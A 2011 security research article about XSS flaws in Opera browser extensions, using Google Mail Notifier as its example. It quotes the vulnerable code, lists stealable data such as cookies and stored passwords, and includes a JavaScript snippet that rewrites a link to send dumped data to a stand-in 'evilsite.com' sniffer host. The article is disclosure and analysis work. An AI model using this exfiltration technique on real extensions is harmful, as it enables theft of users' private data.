Web application vulnerabilities in context of browser extensions - 2: Opera
| Authors: | Taras Ivashchenko |
|---|---|
| Contact: | http://oxdef.info |
| Date: | 2011-04-03 |
| Copyright: | This work is licensed under a Creative Commons Attribution-Share Alike 3.0 Unported License |
Intro
Lets continue to research possible security problems in case of using popular web technologies in browser extensions. Opera is one of the most powerful web browsers today. It has fast rendering and JavaScript engines and a lot of other useful features. For a long time Opera was all-in-one thing in opposition to Mozilla Firefox with its addons. But now when one more strong player called Google Chrome comes into the game in browser's market, Opera decided to support extensions too (yes-yes, I remember about Opera widgets).
Opera logo
Opera/9.80 (X11; Linux i686; U; en) Presto/2.7.62 Version/11.01
Short overview
Opera's extensions are very similar to Google Chrome. They also uses popular web technologies HTML, CSS and JavaScript and are based on the W3C Widgets specification. There is a nice article by Chris Mills "What's in an Opera extension?" [1] - you can read details in it. Briefly Opera extension consists of follow files (some of them are optional):
- background page called "start file" (usually index.html) and scripts - it is extension engine
- popup page - page which appears when you click on extension toolbar button
- JavaScript and CSS files for injection into the pages with custom URL rules (for example, replace all mailto: links with gmail handler)
- config.xml file - like manifest.json in Google Chrome this file provides valuable meta data for the extension like name, ID, description, author data, security policy and so on
- preferences page - to manage extension options
So we have four basic parts which communicates between each other through cross-document messaging:
Injected script <-> Background Process <-> Button/badge <-> Popup
All these parts except 'Button/badge' have separated (it is very important) access to Opera Extensions API:
- Background Process have access to window.widget, opera.extension and opera.contexts objects - it can do everything in these borders including creation of UI elements, but can't access content of current page;
- Injected scrips have access to content of current page and can communicate with other components of extension;
- Popup page can communicate with other parts of extension with postMessage, read/write preferences.
| [1] | "What's in an Opera extension?" by Chris Mills, http://dev.opera.com/articles/view/whats-in-an-opera-extension/ |
XSS
The hole
There is difference between Google Chrome and Opera in case of default restriction level for working with external resources inside extension. Lets look on Google Mail Notifier extension. It is amazing but this one also had a same vulnerability as one in Google Chrome - insecure usage of input user data which causes attack called XSS. In our case the malicious man sends a special letter with payload in subject or letter's body to the victim. Then when the victim checks mail with this extension payload will be executed.
Restricted XSS in Google Mail Notifier
Vulnerable piece of code (js/menu.js):
...
// Check if there are Messages to display
if(event.data.msg && event.data.msg.length > 0)
{
// Add every message
for(var i=0; i < event.data.msg.length; i++)
{
var tooltip = "<div class='tooltip'><p><u>"+ lang.popup_to + " " +
event.data.msg[i].sendermail + "</u><br/>" +
lang.popup_from + " " + event.data.msg[i].authormail +
"<br/><br/></p><p>" + event.data.msg[i].summary + "</p>"
var msg = $('<div></div>').addClass('message').attr("title", tooltip).tooltip({
left: -15
})
.html("<strong>" + event.data.msg[i].authorname + "</strong> : " + event.data.msg[i].title).click({
link: event.data.msg[i].link
}, LoadLink);
$('#message_box').append(msg);
...
Typical injection point in such cases is popup window (same in Google Chrome) because usually content of this window is made by background page using input data (e.g. RSS feeds or e-mail). But, IMHO, it can be possible in case of processing input JSON data to use dangerous constructions for that, e.g. JavaScript function eval like:
var msg = eval("(" + response_text + ")");
instead of
var msg = JSON.parse(response_text);
In such scenario malicious playloada will be executed in context of background page.
Target data
One of the most popular aims of XSS is stealing of private data (e.g. auth data). At current moment Opera does not allows extensions to access browser cookie (each extension has separated cookie storage). So following data may be interesting for malicious man through XSS attack:
- current extension cookies (in very big number of social site extension it is auth data);
- widget.preferences data - for example, there are username and password in Reddit Envelope extension preferences
- context data - in our example with Google Notifier it can be letters data (sender, subject)
- phishing - even in limited context malicious man can use this hole to phish users
Phishing attack vector
How to transfer data
Usually it can be made using "sniffer script" - in payload malicious man simple gets sniffer URL with dumped data as parameter. In our case by default it is not trivial:
In the default policy, a user agent must deny access to network resources external to the widget by default, whether this access is requested through APIs (e.g. XMLHttpRequest) or through markup (e.g. iframe, script, img). [2]
Tested extension has in config file following access rules:
... <!-- Access Policy --> <access origin="https://mail.google.com"/> <access origin="https://www.google.com"/> ...
The <access> element allows authors permission to access external web resources. It means that if extension needs to load some data from outside (like a web resource) then it needs to be specified in this option. Even if you simply try to inject IMG tag with URL which differs from these two this image will not be shown in popup (In my example I used Google logo from www.google.com which is in rules). There are two possible cases which can be usable for attacking:
- extension author can use an asterisk (*) as origin to specify unrestricted access to network resources
- "subdomains" attribute that indicates whether or not the host component part of the access request applies to subdomain
There is another trick - malicious man can make a link or some more attractive UI control with arbitrary URL. So when end user clicks on it dumped data will be transfered to badman:
//...
var a = document.createElement('a');
var d = document.getElementById('open');
a.href = "http://evilsite.com/sniff.php?d=...";
a.id = "foo";
a.innerText = 'Open GMail Tab';
d.parentNode.replaceChild(a, d);
Restricted XSS in Google Mail Notifier - bypass access controls to transfer data
| [2] | "Widget Access Request Policy", http://www.w3.org/TR/widgets-access/ |
Cross extension security
In opposition to Google Chrome Opera don't permit extensions to communicate with each other. I hoped that injected scripts works in same way as UserJS
User JavaScript runs on the global scope, meaning everything that is declared in a script will be shared with the Web page. As such, it is recommended to wrap your script with an anonymous function to protect the script's own data.
But it looks like Opera developers made injected scripts more secure and you can't get access to the data of one extensions from another one, e.g. read variables values. I tried different ways to get sensitive data between extensions but no one experiment was efficacious. Only one way when one extension can make bad things to another is to modify content of page which is injected by the script.
Outro
Opera has very similar extension's architecture to Google Chrome and Opera extensions are also can have security holes which causes attacks like XSS. In same time Opera extension has less opportunities to use main browser features (history, bookmarks, limited cookies) and so it is more difficult for malicious man to get user's private data through vulnerable extension.